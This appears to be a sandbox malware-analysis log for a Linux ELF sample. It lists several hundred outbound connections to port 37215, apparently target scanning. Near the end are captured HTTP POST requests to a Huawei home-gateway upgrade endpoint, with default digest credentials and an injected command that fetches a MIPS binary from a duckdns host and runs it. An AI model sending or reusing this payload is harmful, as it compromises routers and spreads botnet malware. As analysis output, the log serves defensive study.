            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.84.237.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.138.151.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.211.238.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.109.238.153:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.79.38.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.44.42.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.139.238.88:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.102.91.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.255.143.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.96.145.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.173.173.61:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 89.6.251.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.158.124.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.233.156.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.235.161.152:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.105.165.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.62.251.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 140.217.15.246:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.228.81.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.92.242.226:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.91.118.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.36.89.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.142.234.252:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.179.111.31:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.201.131.246:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.203.149.168:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.30.17.9:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.84.252.176:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 63.107.11.102:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.46.166.5:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.68.229.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.120.175.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 49.6.210.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.43.90.96:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.225.217.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.222.50.68:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.99.132.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.3.84.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.131.243.197:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.195.120.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 63.56.107.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.112.22.102:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.190.57.0:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.143.228.247:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 143.204.196.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.161.202.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 68.98.85.62:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.153.85.142:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.3.163.60:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.49.170.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.102.164.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.157.208.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 86.234.158.174:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.105.134.83:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.242.17.68:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.236.114.117:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.72.35.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.161.199.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.189.190.211:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 156.167.142.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.41.241.208:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.87.26.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.24.199.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.216.144.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.247.79.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.159.4.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.93.175.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.197.165.225:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.242.234.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.124.52.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.167.170.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.214.43.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.119.72.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.30.205.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.105.237.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 136.14.197.76:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 115.200.229.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 212.134.168.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 20.166.32.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.195.40.123:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.154.204.189:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 129.144.222.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.245.116.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.154.105.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 198.0.243.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.69.164.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 83.241.196.183:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.209.74.78:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.105.44.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.197.246.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.42.50.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.190.27.238:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 130.124.223.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.113.120.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.80.216.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.204.131.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.241.96.199:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 41.20.99.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 8.39.163.0:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 197.248.101.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 23.183.135.189:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 124.139.25.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 157.180.216.74:37215
            Source: global trafficTCP traffic: 192.168.2.23:20340 -> 217.34.215.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.123.118.194:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.53.185.194:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.37.65.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.68.198.204:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.65.50.118:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.197.84.156:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.18.175.240:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.162.252.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.188.251.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.212.19.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.172.171.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.109.141.42:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.69.249.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.127.46.189:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.244.208.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.82.101.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.165.174.97:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.70.82.52:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.191.210.79:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.199.248.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.75.79.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.248.222.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.159.56.230:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.255.251.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.186.63.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.77.215.197:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.147.192.238:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.197.5.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.182.197.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.138.78.1:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.251.95.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.118.42.238:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.91.157.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.183.224.53:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.186.46.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.212.160.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.38.52.251:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.163.135.248:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.53.48.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.97.139.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.71.169.132:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.184.200.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.185.98.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.144.238.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.253.99.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.11.75.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.168.59.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.63.190.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.128.251.236:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.153.112.184:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.205.56.211:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.229.182.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.190.41.204:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.122.16.250:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.189.155.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.228.140.27:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.185.141.83:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.254.241.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.69.208.159:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.15.162.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.189.252.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.210.203.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.247.252.135:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.213.23.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.203.92.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.163.54.72:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.135.120.9:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.63.8.96:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.223.219.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.195.0.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.39.112.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.247.220.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.71.70.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.169.248.106:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.21.187.0:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.147.183.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.67.101.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.198.203.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.155.89.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.224.77.215:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.19.188.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.221.106.135:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.125.58.92:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.218.193.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.44.134.28:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.193.12.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.201.167.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.79.169.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.7.4.19:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.39.158.199:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.112.130.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.44.136.19:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.67.32.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.91.174.253:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.95.67.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.16.3.238:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.201.179.199:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.118.30.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.225.181.225:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.252.114.165:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.235.18.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.218.53.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.207.250.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.111.212.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.183.247.52:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.13.225.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.219.112.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.249.216.209:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.174.42.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.44.84.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.227.243.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.122.76.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.215.155.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.105.235.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.246.165.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.58.208.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.113.156.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.176.129.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.205.27.199:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.113.73.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.124.12.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.110.120.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.111.245.170:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.211.63.70:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.24.193.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.85.2.159:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.123.31.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.58.194.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.183.53.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.243.145.20:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.204.198.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.92.255.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.190.71.215:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.179.250.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.2.194.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.132.160.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.207.158.170:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.43.27.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.132.147.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.63.159.117:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.37.186.250:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.66.202.253:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.196.26.249:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.40.23.25:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.194.35.251:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.50.97.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.242.150.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.52.0.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.110.67.61:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.177.26.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.244.242.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.1.184.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.61.8.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.173.81.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.214.69.225:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.86.144.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.153.128.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.34.249.95:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.127.113.27:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.185.104.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.150.183.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.229.52.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.97.29.90:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.2.184.55:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.105.12.10:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.4.80.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.109.62.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.12.229.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.197.184.135:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.252.191.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.26.141.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.71.208.103:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.104.76.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.130.208.249:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.133.187.66:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.188.152.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.170.40.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.223.33.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.241.89.111:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.105.151.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.33.223.28:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.63.239.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.218.76.38:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.22.83.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.224.97.215:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.223.234.176:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.170.53.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.57.218.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.88.9.165:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.132.231.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.74.16.66:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.153.149.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:20339 -> 41.192.15.101:37215
            Source: /tmp/fMB6uAXjd0.elf (PID: 6235)Socket: 127.0.0.1::8345Jump to behavior
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 